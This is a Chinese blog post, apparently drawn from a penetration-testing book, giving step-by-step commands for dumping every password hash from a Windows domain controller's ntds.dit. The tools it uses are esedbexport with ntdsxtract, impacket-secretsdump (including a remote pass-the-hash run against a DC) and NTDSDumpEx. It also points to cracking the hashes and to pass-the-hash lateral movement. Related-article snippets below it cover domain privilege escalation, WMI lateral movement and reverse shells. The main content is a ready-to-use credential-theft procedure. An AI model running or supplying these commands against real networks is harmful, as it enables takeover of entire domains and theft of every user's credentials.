攻击域控丝滑小连招~

最新推荐文章于 2024-06-02 09:38:58 发布
最新推荐文章于 2024-06-02 09:38:58 发布
阅读量618 收藏 18
点赞数 11
文章标签: java web安全 网络攻击模型 网络安全 ddos 计算机网络 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74360619/article/details/135992359
版权

如果已经获得本地管理员账号或是域管理员账号,那么下一个目标通常是域控制器,对于渗透测试人员来说,光荣与荣耀的那一刻就是成功从域控制器提取所有的哈希值。但即使是拥有管理员权限,也无法读取域控制器中存储的c:\Windows\NTDS\ntds.dit文件,因为活动目录始终访问这个文件,所有文件被禁止读出。下面介绍几种常用提取ntds.dit的方法。

01

使用esedbexport恢复ntds.dit

将从目标系统导出的ntds.dit放在本地Linux机器中进行解析,本次实验环境为Kail2.0。

在Kali中打开命令行输入命令下载libesedb。

wgethttps://github.com/libyal/libesedb/releases/download/20170121/libesedb-experimental-20170121.tar.gz

首先安装工具依赖环境,如图6-24所示,输入如下命令。

$ sudo apt-get install autoconf automake autopoint libtool pkg-config

图片

图6-24安装工具依赖环境

将下载好的libesedb进行编译安装,依次输入命令:

​​​​​​​

$ ./configure$ make$ sudo make install$ sudo ldconfig

安装成功后会在系统/usr/local/bin中出现esedbexport程序,如图6-25所示。

图片

图6-25查看esedbexport是否安装成功

在Kali中打开命令行进入存放ntds.dit目录中,使用esedbexport 恢复,输入如下命令来提取表信息,如图6-26所示,恢复时间视ntds.dit大小决定,导出成功会在同目录生成一个文件夹。这里的存储信息,我们只需要datatable和link_table。

esedbexport -m tables ntds.dit

图片

图6-26使用esedbexport 打开ntds.dit

可以看到成功导出,如图6-27所示。

图片

图6-27查看被打开后的ntds.dit内容

再下载使用ntdsxtract进行提取域信息,导出Hash。

下载,在Kali输入命令:

$ git clone https://github.com/csababarta/ntdsxtract.git

安装,在Kali输入命令:

python setup.py build && python setup.py install

然后将导出ntds.dit.export文件夹和SYSTEM文件一并放入ntdsxtract文件夹中,输入如下命令。

$ dsusers.py ntds.dit.export/datatable.3 ntds.dit.export/link_table.5 output --syshive SYSTEM --passwordhashes --pwdformat ocl --ntoutfile ntout --lmoutfile lmout |tee all_user.txt

成功将域内所有用户信息及Hash导出到all_user.txt中,如图6-28所示。

图片

图6-28导出与内所有用户和Hash信息

导出到Hash可以放在在线网站破解,也可以本地使用hashcat进行破解或在域内直接进行PTH进行横向渗透。

Tips:ntds.dit中包含域内所有信息,不仅仅包括用户和Hash,也可以通过分析ntds.dit导出域内计算机信息或其他信息,如:

dscomputers.py ntds.dit.export/datatable.3 computer_output --csvoutfile all_computers.csv

该命令可以执行导出域内所有计算机信息,导出为csv格式,方便查看,如图6-29所示。

图片

图6-29导出域内所有计算机信息

02

使用impacket工具包导出Hash

使用impacket工具包中的secretsdump 解析ntds.dit文件,导出Hash。

首先下载impacket工具包,在Kali下,输入如下命令下载该工具。

git clone https://github.com/CoreSecurity/impacket.git

下载成功后,将impacket工具包安装在Kali上,impacket是基于使用Python编写的,Kail默认安装了Python,直接输入命令,如图6-30所示。

python setup.py install

图片

图6-30安装impacket

成功安装后,打开命令行进入ntds.dit和SYSTEM目录,输入如下命令,成功导出ntds.dit中所有Hash,如图6-31所示。

impacket-secretsdump -system SYSTEM -ntds ntds.dit LOCAL

图片

图6-31使用impacket-secretsdump导出用户和Hash

Tips:impacket还可以直接使用用户名和Hash进行验证,从远程域控制器读取ntds.dit转储域Hash,如图6-32所示:​​​​​​​

impacket-secretsdump-hashesaad3b435b51404eeaad3b435b51404ee:135d82f03c3698e2e32bcb11f4da741b -just-dc pentest.com/administrator@192.168.100.205

图片

图6-32使用impacket-secretsdump向DC获取信息

03

Windows下解析ntds.dit导出域账号及域Hash

使用NTDSDumpex.exe进行导出Hash操作。NTDSDumpex.exe下载地址:

https://github.com/zcgonvh/NTDSDumpEx/releases/download/v0.3/NTDSDumpEx.zip

首先将ntds.dit、SYSTEM和NTDSDumpex.exe放在同一目录中,打开cmd输入如下命令,域账号及域Hash被成功导出,如图6-33所示。

NTDSDumpex.exe -d ntds.dit -s system

图片

图6-33使用NTDSDumpex.exe打开ntds.dit

凌晨三点得猫
关注
  • 11
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
纵享丝滑拖拽拼图小游戏
11-18
在这个名为“纵享丝滑拖拽拼图小游戏”的项目中,开发者巧妙地运用了JavaScript(JS)和CSS技术,创建了一个交互性强、用户体验流畅的在线拼图游戏。这个小游戏不仅展示了前端开发的基本技能,还体现了对JavaScript ...
红日靶场-2
分享
12-24 1703
红日靶场-2 . 喜欢吗?小猫......
域环境提权
qq_44657899的博客
11-09 3687
文章目录NetLogon特权域控提权漏洞(CVE-2020-1472)复现 NetLogon特权域控提权漏洞(CVE-2020-1472)复现 简介 CVE-2020-1472是一个windows域控中严重的远程权限提升漏洞,攻击者通过NetLogon,建立与域控间易受攻击安全通道时,可利用此漏洞获取域管访问权限。 影响版本 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-
探索Windows系统深层秘密 —— secretsdump.py详解与应用
最新发布
gitblog_00062的博客
06-02 933
探索Windows系统深层秘密 —— secretsdump.py详解与应用 项目地址:https://gitcode.com/fin3ss3g0d/secretsdump.py 在网络安全和渗透测试的领域中,深入理解目标系统的内部结构是至关重要的一步。今天,我们带来了一个强大且定制化的工具——secretsdump.py,这是基于著名的impacket库的一个增强版本,专为那些对安全研究充满热情...
WMI的使用
weixin_45007073的博客
08-01 2795
WMI介绍基本命令 介绍 WMI的全名为"Windows Management Instrumentation"。从win8后,Windows操作系统都支持WMI,WMI可以在本地或者远程管理计算机系统。 自从PsExec在内网中被严格监控后,越来越多的反病毒厂商将PsExec加入了黑名单,于是乎攻击者转向使用WMI进行横向移动。在渗透时发现,在使用wmiexec进行横向移动时,Windows操作系统默认不会将WMI的操作记录在日志中。因为这个过程不会记录日志,所以对蓝队来说大大增加了溯源的成本。对攻击者来
Impacket官方使用指南
weixin_30877755的博客
04-09 2824
什么是Impacket Impacket是用于处理网络协议的Python类的集合。Impacket专注于提供对数据包的简单编程访问,以及协议实现本身的某些协议(例如SMB1-3和MSRPC)。数据包可以从头开始构建,也可以从原始数据中解析,而面向对象的API使处理协议的深层次结构变得简单。该库提供了一组工具,作为在此库找到可以执行的操作的示例。 有关某些工具的说明,请访问:https:/...
kali下载impacket
李安北的博客
04-16 4220
需要python3的环境 git clone https://github.com/CoreSecurity/impacket.git cd impacket/ python3 -m pip install . python3 setup.py install wmiexec.py:半交互式 shell,通过 Windows Management Instrumentation 使用。它不需要在目标服务器上安装任何服务/代理。以管理员身份运行。高度隐蔽。 wmiexec.py Administrato
利用icmpsh建立icmp隧道反弹shell
huayimy的博客
12-29 749
利用icmpsh建立icmp隧道反弹shell,安装pip2,安装impacket模块,raise ReadTimeoutError,Failed to build future
docker容器编排原来这么丝滑~.doc
07-08
docker容器编排原来这么丝滑~.doc
微信小程序性能优化方案——让你的小程序如此丝滑
03-29
首先,问一个问题,当用户点击小程序后发生了什么? (此图片来源于网络,如有侵权,请联系删除! ) 上图中的三个状态,我们经常遇到,它们分别对应小程序的下面三个状态: ...小程序代码包里面的代码,不是小
iOS上下两collectionView横向联动非常丝滑
05-30
上了许多网站寻找上下两collectionView横向联动的, 都是那种分页滑,一次滑一...狠下心来,研究3日,做出巨丝滑的联动,,,,不再局限于一页一页滑动, 随手速而起,自然停止,上下两collectionView一起丝滑出一道畅快淋漓......
SharpSecDump:.Impacketsecretsdump.py的远程SAM + LSA秘密转储功能的.Net端口
03-19
夏普转储 impacketsecretsdump.py的远程SAM + LSA秘密转储功能的.Net端口。默认情况下,在当前用户的上下文中运行。请仅在您拥有或有权测试的环境中使用:) 用法 SharpSecDump.exe -target=192.168.1.15 -u=admin -p=Password123 -d=test.local 必需标志 -target-逗号分隔的要扫描的IP /主机名列表。请不要在地址之间包含空格。通过将target设置为127.0.0.1,还可以在本地系统上转储哈希。 可选标志 -u-要使用的用户名,如果要使用备用凭据来运行。必须与-p和-d标志一起使用 -p -明文密码才能使用,如果你想使用备用凭据运行。必须与-u和-d标志一起使用 -d-要使用的域(如果要使用备用凭据运行)(对于本地域)。必须与-u和-p标志一起使用 -threads-用于并发枚举多个
xss-labs小游戏
01-25
20关的xss游戏题,每一位xss大佬都做过哟,放在网站根目录即可纵享丝滑,快来尝试吧!
使用impacket工具包导出散列值
ailx10
09-24 325
在上一节的实验中,我们成功的通过多种方法导出ntds.dit文件(活动目录),当然还有其他的方法,这里就不打算一个一个介绍了,都是类似的。ailx10:windows卷影拷贝服务提取ntds.dit ailx10:使用vssadmin提取ntds.dit 今天的主题是:导出散列值使用impacket工具包导出散列值(Linux)使用NTDS Dumpex 导出散列值(Windows)但是在开始之前...
第6章域控制器安全
热门推荐
willow_liang的博客
12-28 1万+
目录 第6章域控制器安全 6.1使用卷影拷贝服务提取ntds.dit 6.1.1通过ntdsutil.exe提取ntds.dit 6.1.2 利用 vssadmin提取 ntds.dit 6.1.3利用vssown.vbs脚本提取ntds.dit 6.1.4使用ntdsutil的iFM创建卷影拷贝 6.1.5使用diskshadow导出ntds.dit 6.1.6 监控卷影拷贝服务的使用情况 6.2导出ntds.dit中的散列值 6.2.1使用 esedbexport恢复ntds..
impacket安装
qq_44881113的博客
09-15 3313
下载地址:https://github.com/SecureAuthCorp/impacket.git Impacket 是一组用于处理网络协议的 Python 类。用于对SMB1-3或IPv4 / IPv6 上的TCP、UDP、ICMP、IGMP,ARP,IPv4,IPv6,SMB,MSRPC,NTLM,Kerberos,WMI,LDAP等协议进行低级编程访问。 具体协议如下 Ethernet, Linux “Cooked” capture. IP, TCP, UDP, ICMP, IGMP, ARP.
超详细Impacket官方使用指南,2024年最新鸿蒙面试题库
m0_74932057的博客
04-16 951
ntlmrelayx.py:此脚本执行NTLM中继攻击,设置SMB和HTTP服务器并将凭据中继到许多不同的协议(SMB,HTTP,MSSQL,LDAP,IMAP,POP3等)。请注意,您可能需要特殊的权限才能在那里进行写入。部分或完全实现以下MSRPC接口:EPM,DTYPES,LSAD,LSAT,NRPC,RRP,SAMR,SRVS,WKST,SCMR,BKRP,DHCPM,EVEN6,MGMT,SASEC,TSCH,DCOM,WMI。它支持启动,停止,删除,状态,配置,列表,创建和更改。
Kali Python2.7安装pip2和模块方法
huayimy的博客
12-16 8139
Kali Python2.7安装pip2和模块,读取超时报错,pip安装模块报错,pip加速,安装pip源
安装impacket
天元喜羊羊的博客
07-07 8053
下载地址:http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Impacket 用easy_install来安装: E:\python>easy_install impacket-0.9.9.9.zip Processing impacket-0.9.9.9.zip Writing
给我一个jsPlumb 如何设置丝滑连线完整的例子
03-11
你可以参考以下代码实现: ```javascript // 初始化 jsPlumb jsPlumb.ready(function() { // 设置连接线的样式 var connectorPaintStyle = { lineWidth: 2, strokeStyle: "#61B7CF", joinstyle: "round", outlineColor: "white", outlineWidth: 2 }; // 设置连接点的样式 var endpointStyle = { endpoint: "Dot", paintStyle: { strokeStyle: "#7AB02C", fillStyle: "transparent", radius: 7, lineWidth: 2 }, hoverPaintStyle: { fillStyle: "#216477", strokeStyle: "#216477" }, connectorHoverStyle: { lineWidth: 2, strokeStyle: "#216477" }, connectorStyle: connectorPaintStyle, maxConnections: -1 }; // 初始化连接器 var instance = jsPlumb.getInstance({ Endpoint: ["Dot", { radius: 2 }], Connector: "StateMachine", HoverPaintStyle: { strokeStyle: "#216477", lineWidth: 2 }, ConnectionOverlays: [ [ "Arrow", { location: 1, id: "arrow", length: 14, foldback: 0.8 } ], [ "Label", { location: 0.1, id: "label", cssClass: "aLabel" } ] ], Container: "canvas" }); // 设置连接点 var sourceEndpoint = { endpoint: "Dot", paintStyle: { strokeStyle: "#7AB02C", fillStyle: "transparent", radius: 7, lineWidth: 2 }, isSource: true, connector: ["Flowchart", { stub: [40, 60], gap: 10, cornerRadius: 5, alwaysRespectStubs: true }], connectorStyle: connectorPaintStyle, maxConnections: -1, connectorHoverStyle: connectorPaintStyle, dragOptions: {}, overlays: [ [ "Label", { location: [0.5, 1.5], label: "Drag", cssClass: "endpointSourceLabel", visible: false } ] ] }; var targetEndpoint = { endpoint: "Dot", paintStyle: { fillStyle: "#7AB02C", radius: 7 }, hoverPaintStyle: endpointHoverStyle, maxConnections: -1, dropOptions: { hoverClass: "hover", activeClass: "active" }, isTarget: true, overlays: [ [ "Label", { location: [0.5, -0.5], label: "Drop", cssClass: "endpointTargetLabel", visible: false } ] ] }; // 添加连接点 instance.addEndpoint("source", sourceEndpoint); instance.addEndpoint("target", targetEndpoint); // 连接两个连接点 instance.connect({ source: "source", target: "target", overlays: [["Label", { label: "Connection", id: "label", visible: false }]] }); }); ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值